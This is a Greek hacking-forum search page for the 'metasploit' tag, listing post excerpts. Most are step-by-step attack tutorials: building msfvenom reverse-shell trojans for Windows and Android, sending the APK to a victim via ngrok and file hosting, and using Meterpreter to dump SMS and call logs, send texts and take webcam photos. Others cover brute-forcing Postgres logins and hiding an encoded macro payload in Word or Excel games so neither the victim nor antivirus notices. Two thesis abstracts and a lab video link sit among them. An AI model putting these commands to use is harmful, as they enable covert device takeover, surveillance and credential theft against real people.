Μετάβαση στο περιεχόμενο

Αναζήτηση στην κοινότητα

Εμφάνιση αποτελεσμάτων για τις ετικέτες 'metasploit'.

  • Αναζήτηση με βάση τις ετικέτες

    Πληκτρολογήστε τις ετικέτες και χωρίστε τες με κόμμα.
  • Αναζήτηση με βάση τον συγγραφέα

Τύπος περιεχομένου


Ενότητες

  • GreekHacking
    • Κανόνες & Ανακοινώσεις
    • Καλωσόρισμα νέων μελών
    • Προτάσεις / Βελτιώσεις
    • Νέα σχετικά με το Hacking/Security
    • Ασφάλεια & Προστασία Δεδομένων
    • Εκτός Θέματος
  • Leaks
    • Hacking Tutorials
    • Anonymity & Privacy / Ανωνυμία και Προστασία Προσωπικών Δεδομένων
    • Προγράμματα για Hacking / Hacking Programs
    • Cracking Οδηγοί & Πληροφορίες
    • Βιβλία σχετικά με το Hacking
    • Προγράμματα - High Quality downloads
    • E-Books
    • XXX Movies

Categories

  • Ορολογίες
  • Hacking για αρχάριους
  • Hacking για προχωρημένους
  • Mobile Hacking
  • Cracking Tutorials
  • Hacking Computers
  • Hacking Tutorials στα Αγγλικά
  • Tutorials for hacks
  • Διάφοροι Οδηγοί
    • Οδηγοί σχετικά με τα Linux
    • Οδηγοί για υπολογιστές
    • Οδηγοί σχετικά με τα Mac
    • Οδηγοί για κινητά
  • Hacking Tutorials στα Αγγλικά Copy

Categories

  • Hacking
  • Ιστοσελίδες/Server
  • Hardware
  • Windows

Βρείτε αποτελέσματα...

Βρείτε αποτελέσματα που...


Ημερομηνία δημιουργίας

  • Start

    End


Τελευταία ενημέρωση

  • Start

    End


Φιλτράρισμα με βάση τον αριθμό των...

  1. Καλησπέρα. Σήμερα θα δούμε πως να πάρουμε απομακρυσμένη πρόσβαση σε Windows συσκευή από metasploit. Αρχικά θα ανοίξουμε το msfvenom για να δημιουργήσουμε το trojan το οποίο θα μας δώσει την πρόσβαση msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.29.161.68 LPORT=4444 -f exe > greekhacking.exe -p = payload -LHOST: localhost LPORT: local port -f: file Για να δούμε την ip μας και να την περάσουμε στο lhost, κάνουμε ifconfig σε ένα άλλο τερματικό. Αφού φτιάξουμε trojan, ανοίγουμε το metasploit (msfconsole) Αφού ανοίξει πληκτρολογούμε use multi/handler Αμέσως μετά βάζουμε payload. set PAYLOAD windows/x64/meterpreter/reverse_tcp Αφού βάλουμε και payload πατάμε show options για να δούμε τις επιλογές μας. Βλέπουμε ότι είναι κενό το lhost οπότε πάμε πάλι στην εντολή ifconfig για να το περάσουμε. Οπότε πατάμε "set LHOST <ip>". Να πω επίσης ότι αν το LPORT σας είναι default αλλάξτε το ανάλογα με το τι βάλατε στο msfvenom πληκτρολογόντας "set LPORT <PORT>". Τώρα θα πάμε σε ένα άλλο τερματικό έτσι ώστε να ανοίξουμε server για να μπορέσουμε να κάνουμε την επίθεση. Πάμε σε τερματικό και πληκτρολογούμε αυτό Όταν λοιπόν είμαστε έτοιμοι, γράφουμε την εντολή exploit στο τερματικό μας Τώρα το metasploit περιμένει αντίδραση από τον χρήστη έτσι ώστε να μας δώσει πρόσβαση. Πάμε να την πάρουμε. Πάμε στα windows στην πορκειμένη περίπτωση που είμαι local, και κατεβάζουμε το αρχείο. http://<ip>/greekhacking.exe (όπως ονόμασα το αρχείο στο msfvenom) και αμέσως μετά το τρέχουμε και βλέπουμε παρακάτω πως όταν το ανοίγουμε το metasploit αντιδρά και αυτό και μας δίνει πρόσβαση (Συγγνώμη αν δεν πίασει το gif) Αφού μας δώσει την πρόσβαση μπορούμε να γράψουμε την εντολή help για να δούμε τα commands που μπορούμε να χρησιμοποιήσουμε. Στην περίπτωσή μου απλά θα πάω στο path C:\\Users\User\Desktop και θα κάνω ls για να δω τα αρχεία στο desktop του χρήστη Εδώ είναι το desktop (επιφάνεια εργασίας). Πάμε να δούμε τι έχει μέσα το αρχείο greekhacking.txt και να το "υποκλέψουμε". Για να το κάνουμε αυτό πατάμε download greekhacking.txt Κατέβηκε. Πάμε στο path /home/mata/ για να ανοίξουμε το αρχείο με vi έτσι ώστε να το δούμε Ανοίγουμε το αρχείο και βλέπουμε πως έχει μέσα αυτό ακριβώς. Πάμε και στην συσκευή του θύματος να δούμε πως είναι το αρχείο Ακριβώς το ίδιο! Αυτό ήταν λοιπόν το tutorial για σήμερα, ήταν ΜΟΝΟ για εκπαιδευτικούς σκοπούς και δεν φέρω καμία ευθύνη --------------------------------------------------------------------------------------------------------------- Buy Me A Coffee: https://www.buymeacoffee.com/mataroot Συνδρομή: https://www.buymeacoffee.com/mataroot/membership Discord Server: https://discord.gg/aStuy26X
  2. Στην παρούσα μεταπτυχιακή διατριβή γίνεται μελέτη και αναλυτική περιγραφή της αρχιτεκτονικής και τεχνολογικής υποδομής του Metasploit Framework καθώς και έρευνα για τις αδυναμίες που υπάρχουν στο λειτουργικό σύστημα Android. Το Metasploit είναι ένα πρόγραμμα, όπου το περιβάλλον εργασίας του βασίζεται σε μια βάση δεδομένων που παρέχει πληροφορίες για ευπάθειες ασφαλείας και χρησιμοποιείται για δοκιμασίες διείσδυσης σε δίκτυα (penetration testing). Με το Metasploit μπορούμε να προσομοιώσουμε πραγματικές καταστάσεις με δίκτυα και επιθέσεις για να βρούμε τις αδυναμίες που υπάρχουν, πριν βρεθούν από κάποιον ανεπιθύμητο και κακόβουλο χρήστη. Χρησιμοποιούμε τεχνικές επιτιθέμενου για να παρακάμψουμε τις οποιεσδήποτε άμυνες διαθέτουμε στο σύστημα μας (πχ. Antivirus, firewall, IPS) ώστε να ανακαλύψουμε τα ‘’εύκολα’’ στοιχεία εισόδου λογαριασμών των χρηστών. Στη συνέχεια της διατριβής, θα μελετήσουμε κάποια θέματα σχετικά με το Android. Το Android είναι ένα λειτουργικό σύστημα για κινητές συσκευές που κατασκευάστηκε από την Google. Βασίζεται στην γλώσσα προγραμματισμού Java3, και στις μέρες μας είναι το πιο διαδεδομένο λειτουργικό σύστημα, καθώς καλύπτει το μεγαλύτερο μερίδιο της αγοράς. Οι κίνδυνοι που διατρέχουν οι χρήστες μιας Android συσκευής, μπορεί να διαφέρουν σε σχέση με αυτούς που καλούμαστε να αντιμετωπίσουμε ως χρήστες σταθερών υπολογιστών (desktop) ή laptop, ωστόσο είναι εξίσου σοβαροί και χρήζουν προσοχής για την αντιμετώπισή τους. Όπως και στους υπολογιστές, έτσι και στα Android, υπάρχουν ιοί. Λόγω του ότι το λειτουργικό Android είναι τόσο διαδεδομένο, τα κρούσματα επιθέσεων σε Android συσκευές, αυξάνονται ολοένα και περισσότερο, με αποτέλεσμα οι χρήστες να είναι μονίμως εκτεθειμένοι σε κακόβουλες επιθέσεις. Η διατριβή θα καταλήξει, με τη μελέτη κάποιων αδυναμιών που υπάρχουν στο Android, και με το πρόγραμμα Metasploit θα κάνουμε επίδειξη δυο (2) περιπτώσεων από κενά ασφαλείας που έχει το Android, οι οποίες μπορούν να εκμεταλλευθούν από κακόβουλους χρήστες (hackers), για να αποκτήσουν πρόσβαση σε συσκευές Android. Ανάλυση του πλαισίου δοκιμών διείσδυσης Metasploit Έρευνα στο λειτουργικό σύστημα Android - Ευθύμιος Κασιδάκης Msc. 2016.pdf Πηγή: Διώνη
  3. Παίζοντας με μερικές απλές εντολές με την mysql βάση δεδομένων που βρίσκεται πάνω στον vulnerable metasploitable server μας. Τίποτα το προχωρημένο άλλα απλές και βασικές εντολές με διάφορες εναλλακτικές που κάποιος μπορεί να χρισιμοποιήσει. Channel Link: https://peertube.it/c/m3tahckr/videos Tuttorial Link: https://peertube.it/w/2qdbAKn3vFp6AbW1tU4YSd
  4. Πολλοί έχουν την περιέργια να μάθουν πως παραβιάζεται ένα κινητό, πως γίνεται να ανοίξουν την κάμερα μας και να μας βλέπουν, πως γίνεται να δουν την ακριβής τοποθεσία μας μέσα από το κινητό μας, και πολλά άλλα. Σε αυτό το Post λοιπόν θα μάθουμε πως γίνεται αυτό, αλλά πριν αρχίσουμε, να πω ότι η ασφάλεια πλέον έχει αναβαθμιστεί οπότε το antivirus τον προηδοποιεί τον χρήστη στον οποίο κάνετε την επίθεση ότι πρόκειται για κάποιου είδους Trojan (Δούριος ίππος). Επίσης να προσθέσω ότι το λειτουργικό σύστημα που θα χρησιμοποιηθεί γι αυτήν την επίθεση είναι Linux. Συγκεκριμένα το Kali. Θα χρησιμοποιήσουμε τα εξής: msfvenom, msfconsole, ngrok, apache, https://www.gofile.io Το ngrok είναι αυτό το οποίο θα μας βοηθήσει να έχουμε απομακρυσμένη πρόσβαση στην συσκευή του θύματος. Αν δεν θέλετε να κατεβάσετε το ngrok μπορείτε να κάνετε forward την port σας, φτιάχνοντας τις ρυθμίσεις εσωτερικά του ρούτερ σας. Πάμε λοιπόν να ανοίξουμε το ngrok, γράφοντας ./ngrok tcp 8080 στο terminal μας. Για αρχή, θα πρέπει να φτιάξουμε το λεγόμενο Payload. Δηλαδή τον "ιο" ο οποίος θα εισβάλει μέσα στην συσκευή του θύματος και θα μας δώσει τις απαραίτητες δυνατότητες για να μπορέσουμε να διαχειρηστούμε την συσκευή. Για να το φτιάξουμε αυτό θα χρειαστούμε το msfvenom. msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= R> /var/www/html/greekhacking.apk Στο msfvenom γράφουμε τις παραπάνω εντολές. Θα χρησιμοποιήσουμε λοιπόν το android/meterpreter/reverse_tcp, LHOST θα βάλουμε το tcp που μας δίνει το ngrok και LPORT αυτό επίσης που μας δίνεται στο ngrok. Μετά θα γράψουμε R > /var/www/html/ για να βάλουμε το αρχείο στην θέση /var/www/html/ και θα δώσουμε όνομα στο αρχείο μας. (π.χ greekhacking.apk). Αφού το κάνουμε αυτό λοιπόν πατάμε enter και το αρχείο μας είναι έτοιμο. Μετά ανοίγουμε ένα άλλο Terminal και ξεκινάμε το service apache. Γράφουμε λοιπόν service apache2 start και για να τσεκάρουμε αν όντως λειτουργεί, γράφουμε την εντολή service apache2 status. Όταν το κάνουμε αυτό, ανοίγουμε ένα άλλο Terminal στο οποίο θα ξεκινήσουμε την επίθεση. το msfconsole Τώρα θα πάμε στο https://www.gofile.io για να ανεβάσουμε το αρχείο που φτιάξαμε πριν από το msfvenom. Όταν ανεβάσουμε το αρχείο, επιστρέφουμε στο msfconsole και γράφουμε την εντολή use multi/handler Μετά τα εξής: set payload android/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 8080 Το LPORT μπαίνει αναλόγως με το τι port είχαμε βάλει στο ngrok στην αρχή. Εγώ είχα γράψει ./ngrok tcp 8080. Εσείς μπορείτε να βάλετε 4444. Αφού τελειώσουμε και με αυτό, στέλνουμε το Link με το αρχείο που ανεβάσαμε πρίν για να το κατεβάσει το θύμα στην συσκευή του. Και γράφουμε στο Τερμιναλ exploit. Εδώ περιμένουμε να εγκαταστήσει το θύμα την εφαρμογή και να την ανοίξει. Όταν λοιπόν την ανοίξει θα μας δώσει πρόσβαση στην συσκευή του ανοίγοντας κάποια sessions. Αφού ανοίξει τα sessions, είμαστε έτοιμοι. Είμαστε μέσα στην συσκευή του θύματος και μπορούμε να εκτελέσουμε εντολές. Επειδή όμως δεν ξέρουμε τι εντολές μπορούμε να εκτελέσουμε, θα γράψουμε το command "help" έτσι ώστε να μας βγάλει μία ολόκληρη λίστα με τα απαραίτητα. Η ανάρτηση αυτή είναι καθαρά για εκπαιδευτικούς σκοπούς και δεν φέρω καμία ευθύνη για το πως θα το χρησιμοποιήσετε. Για οποιαδήποτε ερώτηση κάντε σχόλιο.
  5. Σε αυτό το άρθρο, θα μάθουμε πως να χακάρουμε μια συσκευή android και πως να την κάνουμε exploit όπως επιθυμούμε. Το android είναι ένα λειτουργικό σύστημα βασισμένο στον πυρήνα του Linux. Χρησιμοποιεί τύπο αρχείου APK για την εγκατάσταση εφαρμογών. Έτσι, το malware μας πρέπει να είναι επίσης σε APK. Για να το φτιάξουμε θα εκτελέσουμε την παρακάτω εντολή για msfvenom: [hide] msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 > shell.apk Αφού φτιαχτεί το malware θα ξεκινήσουμε ένα handler για να πάρουμε session με την εντολή: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.1.109 set lport 1234 exploit Όταν τρέξει το exploit στείλε το αρχείο APK στο θύμα και σιγουρευτείτε πως θα το τρέξουν στο κινητό τους. Όταν το αρχείο αυτό τρέξει τότε θα πάρετε session όπως φαίνεται στην παρακάτω εικόνα: Τώρα, υπάρχουν πολλές εντολές για παραπάνω exploitation την συσκευή του χρήστη. Θα σας δείξουμε στην παρακάτω εικόνα μερικά από τα πιο πρακτικά. Μπορείτε να δείτε αν η συσκευή είναι rooted με την παρακάτω εντολή: check_root Μπορείτε επίσης να κάνετε dump όλα τα call-logs σε κάποιο αρχείο με την εντολή: dump_calllog Η οποία θα φτιάξει ένα αρχείο TXT με την λεπτομερές λίστα των call logs του θύματος. Εκτελέστε την παρακάτω εντολή για να την διαβάσετε: cat <όνομα_αρχείου_txt> Μπορείτε επίσης να στείλετε και όλων των ειδών SMS από την συσκευή με την εντολή: send_sms -d <αριθμός_παραλήπτη> -t <κείμενο> Μπορείτε να τραβήξετε φωτογραφία από την κάμερα με την εντολή: webcam_snap η οποία τα αποθηκεύση την φωτογραφία σε αρχείο JPEG Για να κάνετε dump τα SMS τρέξτε την εντολή: dump_sms Όπως και με τα call logs, μπορείτε να διαβάσετε το αρχείο με την εντολή cat (δείτε την εικόνα από κάτω:) Με αυτόν τον τρόπο μπορείτε να κάνετε exploit την συσκευή όπως θέλετε. [/hide]
  6. Σε αυτό το άρθρο θα μάθουμε πως να πάρουμε το πρόσβαση στην υπηρεσία Postgres στον υπολογιστή του θύματος από το port 5432. Υπάρχουν διάφοροι τρόποι για να το κάνουμε αυτό και σε αυτό το άθρο θα μάθουμε αρκετούς μιας και διαφορετικές καταστάσεις απαιτούν διαφορετικά μέτρα. [hide] Περιεχόμενα: Hydra X-Hydra Medusa Ncrack Patator Metasploit Ας ξεκινήσουμε! Hydra Το Hydra είναι συνήθως το πρώτο εργαλείο επιλογής. Μπορεί να κάνει συνεχόμενα dictionary attacks ενάντια σε παραπάνω από 50 πρωτόκολλα όπως telnet, Postgres, http, https, smb, διάφορες βάσεις δεδομένων και άλλα. Τώρα πρέπει να επιλέξουμε ένα word list. Όπως με κάθε dictionary attack το wordlist που θα διαλέξουμε θα είναι το κλειδί μας. Το Kali Linux έχει ήδη έτοιμα πάρα πολλά word lists. Άρα τρέξτε απλά την παρακάτω εντολή: hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.120 postgres -L: Δείχνει το path του word list χρηστών user.txt -P: Δείχνει το path του word list κωδικών pass.txt Μόλις εκτελεστεί η εντολή, το Hydra θα ξεκινήσει τα dictionary attacks και θα σας δώσει το σωστό username και το σωστό password σε πολύ λίγο χρόνο. Όπως βλέπετε πήραμε επιτυχώς το Username το οποίο είναι Postgres και τον κωδικό ο οποίος είναι postgres. xHydra Το xHydra είναι απλά το Hydra με γραφικό περιβάλλον. Για αυτή την μέθοδο: Ανοίξτε το xHydra στο Kali και τσεκάρετε την επιλογή Single Target. Έπειτα δώστε την IP του θύματος. Μετά στο κουτί που λέει Protocol επιλέξτε postgres και στο κουτί port βάλτε τον αριθμό 5432 Τώρα πάτε στο Tab που λέει Passwords τσεκάρετε το Username List και δώστε το path του wordlist στο κουτί από δίπλά. Στην συνέχεια τσεκάρετε την επιλογή Password List και δώστε το path του wordlist στο κουτί από δίπλά. Αφού τελιώσετε πάτε στο Tab που λέει Start και πατήστε το κουμπί Start στα αριστερά. Έτσι θα ξεκινήσει το dictionary attack και θα πάρετε το όνομα χρήστη και τον κωδικό του θύματός σας. Ουσιαστικά αυτή η μέθοδος είναι ίδια με την προιγούμενη, απλά τα κάνουμε όλα μέσα από ένα γραφικό περιβάλλον. Medusa Το Medusa είναι ένα εργαλείο brute-force το οποίο προορίζεται για γρήγορες, πολλαπλές και παράλληλες επιθέσεις οι οποίες μπορούν με ευκολεία να τροποποιηθούν. Υποστηρίζει πολλά πρωτόκολλα όπως τα: AFP, CVS, POSTGRES, HTTP, IMAP, rlogin, SSH, Subversion, VNC και άλλα. Εκτελέστε την παρακάτω εντολή: medusa -h 192.168.1.120 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres -U: Δείχνει το path γιατ την λίστα με τα ονόματα χρηστών. -P: Δείχνει το path για την λίστα με τους κωδικούς. Όπως φαίνεται παρακάτω, στο τέλος της επίθεσης πήραμε επιτυχώς το όνομα Postgres και τον κωδικό postgres Ncrack Το Ncrack είναι ένα γρήγορο εργαλείο network authentication και cracking. Φτιάχτικε για να βοηθάει εταιρίες στο να τεστάρουνε το δύκτιό τους τεστάρωντας όλους τους κόμβους που ανήκουν σε αυτό (host και συσκευές) για αδύναμους κωδικούς. Τρέξτε την παρακάτω εντολή: ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.120:5432 -U: Δείχνει το path γιατ την λίστα με τα ονόματα χρηστών. -P: Δείχνει το path για την λίστα με τους κωδικούς. Όπως φαίνεται παρακάτω στο τέλος της επίθεσης πήραμε επιτυχώς το όνομα Postgres και τον κωδικό postgres Patator Το Patator είναι ένα πολυεργαλείο για brute-force με εύκολη τροποποίηση και ευέλικτη χρήση. Μπορεί να κάνει επιθέσεις brute force σε διάφορα ports όπως το Postgres, HTTP, SMB και άλλα. Η εντολή είναι: patator pgsql_login host=192.168.1.120 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt Από την παρακάτω εικόνα είναι φανερό πως μόλις τελειώσει η επίθεση πέρνουμε το όνομα χρήστη και τον κωδικό του θύματος. Metasploit Αυτό το module δοκιμάζει να κάνει ταυτοποίηση με ένα στιγμιότυπο "PostgreSQL" χρησιμοποιόντας διάφορους συνδιασμούς από τα αρχεία USER_FILE, PASS_FILE και USERPASS_FILE. Αξίζει να σημειώθεί πως οι κωδικοί μπορεί να είναι είτε σε μορφή plaintext, είτε σε μορφή MD5 formatted hash. Ανοίξτε το terminal και γράψτε: msfconsole Μόλις ανοίξει το metasploit εκτελέστε τις ακόλουθες εντολές: use auxiliary/scanner/postgres/postgres_login msf exploit (scanner/postgres/postgres_login)>set rhosts 192.168.1.120 msf exploit (scanner/postgres/postgres_login)>set user_file /root/Desktop/user.txt msf exploit (scanner/postgres/postgres_login)>set pass_file /root/Desktop/pass.txt msf exploit (scanner/postgres/postgres_login)>set stop_on_success true msf exploit (scanner/postgres/postgres_login)> exploit Από την παρακάτω εικόνα είναι φανερό πως μόλις τελειώσει η επίθεση πέρνουμε το όνομα χρήστη και τον κωδικό του θύματος. [/hide]
  7. Σκοπός της παρούσας διπλωματικής εργασίας είναι να παρουσιάσει την διαδικασία, να προτείνει μια συγκεκριμένη μεθοδολογία για την υλοποίηση του penetration testing, καθώς και την χρησιμότητα του penetration testing σε μία επιχείρηση ή έναν οργανισμό. Παρουσιάζονται επίσης οι βασικές τεχνικές αλλά και τα εργαλεία με τα οποία μπορεί να επιτευχθεί το penetration testing. Η δομή της εργασίας χωρίζεται σε δύο βασικά μέρη. Στο πρώτο μέρος εστιάζεται στην αξιολόγηση ασφαλείας των πληροφοριακών συστημάτων και των δικτύων, την αναγκαιότητα της ύπαρξης της, την σχετική ορολογία, καθώς και τους τρόπους παραβίασης και τα είδη των επιθέσεων. Στο δεύτερο μέρος, γίνεται αναλυτική παρουσίαση του πλαισίου Metasploit και παρουσιάζονται συγκεκριμένα βήματα για την υλοποίηση της διαδικασίας penetration testing. Επίσης παρουσιάζονται συγκεκριμένα εργαλεία, τα οποία μπορούν να χρησιμοποιηθούν μαζί με το Metasploit Framework και περιγράφονται τα exploits που χρησιμοποιούνται κατά την διαδικασία του penetration testing. ΕΛΕΓΧΟΣ ΕΥΠΑΘΕΙΩΝ ΜΕ ΧΡΗΣΗ ΤΟΥ ΠΛΑΙΣΙΟΥ METASPLOIT - Bilis Eustratios Msc2011.pdf Πηγή: ΨΗΦΙΔΑ - Ψηφιακή Βιβλιοθήκη και Ιδρυματικό Αποθετήριο του Πανεπιστημίου Μακεδονίας
  8. Metasploit είναι ένα πολυ χρήσιμο εργαλείο για επίδοξους Hackers και Pen-testers στα Linux μέσο του οποίου μπορούμε να χρησιμοποιήσουμε πολλές (Built In)μεθόδους με άπειρες δυνατότητες.Μια απο αυτές είναι και η ενσωμάτωση ή μολύνση εγγράφων Word και Excel με κακόβουλο Metasploit Payload ή και δική σας κατασκευής, αγορασμένο ή leaked Payload . Αυτή η μέθοδος είναι χρήσιμη όταν εκτελείτε απο την θέση του θύματος καθώς παρακάμπτει φίλτρα που δεν επιτρέπουν εκτελέσιμα αρχεία αλλά μόνο έγγραφα για να περάσουν μέσα. Για να ξεκινήσετε, πρέπει πρώτα να δημιουργήσετε VBScript Payload #msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe [IMG=http://i65.tinypic.com/axe4y8.png] Καθώς το μήνυμα εξόδου δείχνει ότι, το σενάριο είναι μοιρασμένο σε 2 μέρη. Το πρώτο μέρος του σεναρίου δημιουργεί ένα μακρο και το δεύτερο μέρος είναι προσαρτημένο στο ίδιο το κείμενο του εγγράφου,για αυτό θα χρειαστεί να μεταφέρετε αυτό το σενάριο πάνω σε ένα μηχάνημα με εγκατεστημένα Windows και Office και να εκτελέσετε τα ακόλουθα: Word/Excel 2003: Tools -> Macros -> Visual Basic Editor Word/Excel 2007: View Macros -> then place a name like "moo" and select "create". [IMG=http://i63.tinypic.com/8zmnbd.png] Αυτό θα σας ανοίξει το Visual Basic Editor. Επικολλήστε την έξοδο του πρώτου τμήματος του Payload σεναρίου στον VB επεξεργαστή, αποθηκεύετε και στη συνέχεια επικολλήστε και το υπόλοιπο του σεναρίου στο έγγραφο Word. Αυτό θα είναι εκτελέσιμο απο το θύμα όταν πχ του το στείλετε μέσο email. Προκειμένου να μην υποψιαστεί κάτι το θύμα θα μπορούσατε να το ενσωματώσετε σε ένα από τα πολλά παιχνίδια Word / Excel που είναι διαθέσιμα στο Διαδίκτυο. Με αυτόν τον τρόπο, ενώ ο χρήστης παίζει το παιχνίδι, εσείς εργάζεστε στο παρασκήνιο. Αυτό σας δίνει κάποιο επιπλέον χρόνο για να χρησιμοποιήσετε κάποια άλλη διαδικασία, αν χρησιμοποιείτε Meterpreter Payload. [IMG=http://i65.tinypic.com/okpqm9.png] Εδώ θα δείτε μια γενικη ονομασία(παράδειγμα) της μακροεντολής [IMG=http://i68.tinypic.com/2efnnzn.png] Πρίν στείλετε το Payload θα πρέπει να ξεκινήστε την διαδικασία του listener στα Metasploit. #msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.101; set LPORT 8080; run; exit -y" [IMG=http://i68.tinypic.com/2epj2ua.png] Αφού είναι όλα έτοιμα μπορούμε να τσεκάρουμε αν όλα λειτουργούν σωστά ανοίγοντας το αρχείο και το Metasploit exploit/multi/handler listener: [IMG=http://i66.tinypic.com/2gxlppt.png] Επιτυχία! Έχουμε το Meterpreter με δικαίωματα στο σύστημα που άνοιξε το έγγραφο, και το καλύτερο από όλα, δεν μας ανακάλυψε το anti-virus !!! Ευχαριστώ!. Τα Tutorial Χρησιμοποιούνται μόνο για εκπαιδευτικούς σκοπούς και με υπευθυνότητα!. View full οδηγό

ChatBox

ChatBox

Chatroom Rules

  • Το GreekHacking.Gr είναι ένα ελληνικό forum και επιτρέπεται μόνο η χρήση της Ελληνική Γλώσσας (ούτε greeklish).
  • Δεν επιτρέπονται οι βρισιές και γενικά η χρήση χυδαίας γλώσσας.
  • Απαγορεύεται αυστηρά το πορνογραφικό, προσβλητικό και βίαιο περιεχόμενο.
  • Μην χρησιμοποιείτε κεφαλαία γράμματα η σύμβολα.
×
×
  • Create New...